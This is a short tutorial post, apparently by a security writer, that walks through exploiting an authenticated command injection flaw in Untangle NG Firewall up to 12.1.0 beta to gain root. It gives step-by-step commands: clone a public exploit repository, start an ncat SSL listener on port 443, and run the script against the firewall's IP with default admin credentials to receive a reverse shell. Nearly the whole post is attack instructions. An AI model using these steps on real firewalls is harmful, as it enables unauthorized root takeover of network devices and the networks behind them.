Untangle’s NG Firewall enables us to quickly and easily create the network policies that deliver the perfect balance between security and productivity.
Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit. A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy.
First of all clone the the github repo of the exploit and enter in the directory with command:
git clone https://github.com/3xocyte/Exploits && cd Exploits
and now give the python script permission to execute with command:
chmod +x untangle-ngfw-12.1-ci.py
Now set the netcat listener at port 443 for ssl connection in a new terminal with command:
ncat –ssl -nlvp 443
Now execute the python script with command:
python untangle-ngfw-12.1-ci.py 192.168.2.1 192.168.2.3 admin admin
Here 192.168.2.1 is the Untangle firewall IP and 192.168.2.3 is our system IP and username , password of the Untangle Firewall are admin , admin .
As soon as the above command is successfully executed we get the reverse shell.
Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn .